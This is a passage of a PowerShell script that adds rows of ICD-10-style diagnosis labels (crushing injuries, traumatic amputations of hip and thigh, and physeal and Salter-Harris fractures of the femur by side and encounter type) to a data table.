$DiagnosisList.Rows.Add("Crushing injury of unspecified thigh","Crushing injury of unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified thigh","Crushing injury of unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of right thigh","Crushing injury of right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right thigh","Crushing injury of right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right thigh","Crushing injury of right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of left thigh","Crushing injury of left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left thigh","Crushing injury of left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left thigh","Crushing injury of left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified hip with thigh","Crushing injury of unspecified hip with thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified hip with thigh","Crushing injury of unspecified hip with thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified hip with thigh","Crushing injury of unspecified hip with thigh, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of right hip with thigh","Crushing injury of right hip with thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right hip with thigh","Crushing injury of right hip with thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right hip with thigh","Crushing injury of right hip with thigh, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of left hip with thigh","Crushing injury of left hip with thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left hip with thigh","Crushing injury of left hip with thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left hip with thigh","Crushing injury of left hip with thigh, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at right hip joint","Complete traumatic amputation at right hip joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at right hip joint","Complete traumatic amputation at right hip joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at right hip joint","Complete traumatic amputation at right hip joint, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at left hip joint","Complete traumatic amputation at left hip joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at left hip joint","Complete traumatic amputation at left hip joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at left hip joint","Complete traumatic amputation at left hip joint, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at unspecified hip joint","Complete traumatic amputation at unspecified hip joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at unspecified hip joint","Complete traumatic amputation at unspecified hip joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at unspecified hip joint","Complete traumatic amputation at unspecified hip joint, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at right hip joint","Partial traumatic amputation at right hip joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at right hip joint","Partial traumatic amputation at right hip joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at right hip joint","Partial traumatic amputation at right hip joint, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at left hip joint","Partial traumatic amputation at left hip joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at left hip joint","Partial traumatic amputation at left hip joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at left hip joint","Partial traumatic amputation at left hip joint, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at unspecified hip joint","Partial traumatic amputation at unspecified hip joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at unspecified hip joint","Partial traumatic amputation at unspecified hip joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at unspecified hip joint","Partial traumatic amputation at unspecified hip joint, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between right hip and knee","Complete traumatic amputation at level between right hip and knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between right hip and knee","Complete traumatic amputation at level between right hip and knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between right hip and knee","Complete traumatic amputation at level between right hip and knee, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between left hip and knee","Complete traumatic amputation at level between left hip and knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between left hip and knee","Complete traumatic amputation at level between left hip and knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between left hip and knee","Complete traumatic amputation at level between left hip and knee, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between unspecified hip and knee","Complete traumatic amputation at level between unspecified hip and knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between unspecified hip and knee","Complete traumatic amputation at level between unspecified hip and knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation at level between unspecified hip and knee","Complete traumatic amputation at level between unspecified hip and knee, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between right hip and knee","Partial traumatic amputation at level between right hip and knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between right hip and knee","Partial traumatic amputation at level between right hip and knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between right hip and knee","Partial traumatic amputation at level between right hip and knee, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between left hip and knee","Partial traumatic amputation at level between left hip and knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between left hip and knee","Partial traumatic amputation at level between left hip and knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between left hip and knee","Partial traumatic amputation at level between left hip and knee, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between unspecified hip and knee","Partial traumatic amputation at level between unspecified hip and knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between unspecified hip and knee","Partial traumatic amputation at level between unspecified hip and knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation at level between unspecified hip and knee","Partial traumatic amputation at level between unspecified hip and knee, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right hip and thigh, level unspecified","Complete traumatic amputation of right hip and thigh, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right hip and thigh, level unspecified","Complete traumatic amputation of right hip and thigh, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of right hip and thigh, level unspecified","Complete traumatic amputation of right hip and thigh, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left hip and thigh, level unspecified","Complete traumatic amputation of left hip and thigh, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left hip and thigh, level unspecified","Complete traumatic amputation of left hip and thigh, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of left hip and thigh, level unspecified","Complete traumatic amputation of left hip and thigh, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified hip and thigh, level unspecified","Complete traumatic amputation of unspecified hip and thigh, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified hip and thigh, level unspecified","Complete traumatic amputation of unspecified hip and thigh, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of unspecified hip and thigh, level unspecified","Complete traumatic amputation of unspecified hip and thigh, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right hip and thigh, level unspecified","Partial traumatic amputation of right hip and thigh, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right hip and thigh, level unspecified","Partial traumatic amputation of right hip and thigh, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of right hip and thigh, level unspecified","Partial traumatic amputation of right hip and thigh, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left hip and thigh, level unspecified","Partial traumatic amputation of left hip and thigh, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left hip and thigh, level unspecified","Partial traumatic amputation of left hip and thigh, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of left hip and thigh, level unspecified","Partial traumatic amputation of left hip and thigh, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified hip and thigh, level unspecified","Partial traumatic amputation of unspecified hip and thigh, level unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified hip and thigh, level unspecified","Partial traumatic amputation of unspecified hip and thigh, level unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of unspecified hip and thigh, level unspecified","Partial traumatic amputation of unspecified hip and thigh, level unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of right femur","Unspecified physeal fracture of upper end of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of right femur","Unspecified physeal fracture of upper end of right femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of right femur","Unspecified physeal fracture of upper end of right femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of right femur","Unspecified physeal fracture of upper end of right femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of right femur","Unspecified physeal fracture of upper end of right femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of right femur","Unspecified physeal fracture of upper end of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of left femur","Unspecified physeal fracture of upper end of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of left femur","Unspecified physeal fracture of upper end of left femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of left femur","Unspecified physeal fracture of upper end of left femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of left femur","Unspecified physeal fracture of upper end of left femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of left femur","Unspecified physeal fracture of upper end of left femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of left femur","Unspecified physeal fracture of upper end of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of unspecified femur","Unspecified physeal fracture of upper end of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of unspecified femur","Unspecified physeal fracture of upper end of unspecified femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of unspecified femur","Unspecified physeal fracture of upper end of unspecified femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of unspecified femur","Unspecified physeal fracture of upper end of unspecified femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of unspecified femur","Unspecified physeal fracture of upper end of unspecified femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of unspecified femur","Unspecified physeal fracture of upper end of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of right femur","Salter-Harris Type I physeal fracture of upper end of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of right femur","Salter-Harris Type I physeal fracture of upper end of right femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of right femur","Salter-Harris Type I physeal fracture of upper end of right femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of right femur","Salter-Harris Type I physeal fracture of upper end of right femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of right femur","Salter-Harris Type I physeal fracture of upper end of right femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of right femur","Salter-Harris Type I physeal fracture of upper end of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of left femur","Salter-Harris Type I physeal fracture of upper end of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of left femur","Salter-Harris Type I physeal fracture of upper end of left femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of left femur","Salter-Harris Type I physeal fracture of upper end of left femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of left femur","Salter-Harris Type I physeal fracture of upper end of left femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of left femur","Salter-Harris Type I physeal fracture of upper end of left femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of left femur","Salter-Harris Type I physeal fracture of upper end of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of unspecified femur","Salter-Harris Type I physeal fracture of upper end of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of unspecified femur","Salter-Harris Type I physeal fracture of upper end of unspecified femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of unspecified femur","Salter-Harris Type I physeal fracture of upper end of unspecified femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of unspecified femur","Salter-Harris Type I physeal fracture of upper end of unspecified femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of unspecified femur","Salter-Harris Type I physeal fracture of upper end of unspecified femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of unspecified femur","Salter-Harris Type I physeal fracture of upper end of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of right femur","Other physeal fracture of upper end of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of right femur","Other physeal fracture of upper end of right femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of right femur","Other physeal fracture of upper end of right femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of right femur","Other physeal fracture of upper end of right femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of right femur","Other physeal fracture of upper end of right femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of right femur","Other physeal fracture of upper end of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of left femur","Other physeal fracture of upper end of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of left femur","Other physeal fracture of upper end of left femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of left femur","Other physeal fracture of upper end of left femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of left femur","Other physeal fracture of upper end of left femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of left femur","Other physeal fracture of upper end of left femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of left femur","Other physeal fracture of upper end of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of unspecified femur","Other physeal fracture of upper end of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of unspecified femur","Other physeal fracture of upper end of unspecified femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of unspecified femur","Other physeal fracture of upper end of unspecified femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of unspecified femur","Other physeal fracture of upper end of unspecified femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of unspecified femur","Other physeal fracture of upper end of unspecified femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of unspecified femur","Other physeal fracture of upper end of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of right femur","Unspecified physeal fracture of lower end of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of right femur","Unspecified physeal fracture of lower end of right femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of right femur","Unspecified physeal fracture of lower end of right femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of right femur","Unspecified physeal fracture of lower end of right femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of right femur","Unspecified physeal fracture of lower end of right femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of right femur","Unspecified physeal fracture of lower end of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of left femur","Unspecified physeal fracture of lower end of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of left femur","Unspecified physeal fracture of lower end of left femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of left femur","Unspecified physeal fracture of lower end of left femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of left femur","Unspecified physeal fracture of lower end of left femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of left femur","Unspecified physeal fracture of lower end of left femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of left femur","Unspecified physeal fracture of lower end of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of unspecified femur","Unspecified physeal fracture of lower end of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of unspecified femur","Unspecified physeal fracture of lower end of unspecified femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of unspecified femur","Unspecified physeal fracture of lower end of unspecified femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of unspecified femur","Unspecified physeal fracture of lower end of unspecified femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of unspecified femur","Unspecified physeal fracture of lower end of unspecified femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of unspecified femur","Unspecified physeal fracture of lower end of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of right femur","Salter-Harris Type I physeal fracture of lower end of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of right femur","Salter-Harris Type I physeal fracture of lower end of right femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of right femur","Salter-Harris Type I physeal fracture of lower end of right femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of right femur","Salter-Harris Type I physeal fracture of lower end of right femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of right femur","Salter-Harris Type I physeal fracture of lower end of right femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of right femur","Salter-Harris Type I physeal fracture of lower end of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of left femur","Salter-Harris Type I physeal fracture of lower end of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of left femur","Salter-Harris Type I physeal fracture of lower end of left femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of left femur","Salter-Harris Type I physeal fracture of lower end of left femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of left femur","Salter-Harris Type I physeal fracture of lower end of left femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of left femur","Salter-Harris Type I physeal fracture of lower end of left femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of left femur","Salter-Harris Type I physeal fracture of lower end of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of unspecified femur","Salter-Harris Type I physeal fracture of lower end of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of unspecified femur","Salter-Harris Type I physeal fracture of lower end of unspecified femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of unspecified femur","Salter-Harris Type I physeal fracture of lower end of unspecified femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of unspecified femur","Salter-Harris Type I physeal fracture of lower end of unspecified femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of unspecified femur","Salter-Harris Type I physeal fracture of lower end of unspecified femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of unspecified femur","Salter-Harris Type I physeal fracture of lower end of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of right femur","Salter-Harris Type II physeal fracture of lower end of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of right femur","Salter-Harris Type II physeal fracture of lower end of right femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of right femur","Salter-Harris Type II physeal fracture of lower end of right femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of right femur","Salter-Harris Type II physeal fracture of lower end of right femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of right femur","Salter-Harris Type II physeal fracture of lower end of right femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of right femur","Salter-Harris Type II physeal fracture of lower end of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of left femur","Salter-Harris Type II physeal fracture of lower end of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of left femur","Salter-Harris Type II physeal fracture of lower end of left femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of left femur","Salter-Harris Type II physeal fracture of lower end of left femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of left femur","Salter-Harris Type II physeal fracture of lower end of left femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of left femur","Salter-Harris Type II physeal fracture of lower end of left femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of left femur","Salter-Harris Type II physeal fracture of lower end of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of unspecified femur","Salter-Harris Type II physeal fracture of lower end of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of unspecified femur","Salter-Harris Type II physeal fracture of lower end of unspecified femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of unspecified femur","Salter-Harris Type II physeal fracture of lower end of unspecified femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of unspecified femur","Salter-Harris Type II physeal fracture of lower end of unspecified femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of unspecified femur","Salter-Harris Type II physeal fracture of lower end of unspecified femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of unspecified femur","Salter-Harris Type II physeal fracture of lower end of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of right femur","Salter-Harris Type III physeal fracture of lower end of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of right femur","Salter-Harris Type III physeal fracture of lower end of right femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of right femur","Salter-Harris Type III physeal fracture of lower end of right femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of right femur","Salter-Harris Type III physeal fracture of lower end of right femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of right femur","Salter-Harris Type III physeal fracture of lower end of right femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of right femur","Salter-Harris Type III physeal fracture of lower end of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of left femur","Salter-Harris Type III physeal fracture of lower end of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of left femur","Salter-Harris Type III physeal fracture of lower end of left femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of left femur","Salter-Harris Type III physeal fracture of lower end of left femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of left femur","Salter-Harris Type III physeal fracture of lower end of left femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of left femur","Salter-Harris Type III physeal fracture of lower end of left femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of left femur","Salter-Harris Type III physeal fracture of lower end of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of unspecified femur","Salter-Harris Type III physeal fracture of lower end of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of unspecified femur","Salter-Harris Type III physeal fracture of lower end of unspecified femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of unspecified femur","Salter-Harris Type III physeal fracture of lower end of unspecified femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of unspecified femur","Salter-Harris Type III physeal fracture of lower end of unspecified femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of unspecified femur","Salter-Harris Type III physeal fracture of lower end of unspecified femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of unspecified femur","Salter-Harris Type III physeal fracture of lower end of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of right femur","Salter-Harris Type IV physeal fracture of lower end of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of right femur","Salter-Harris 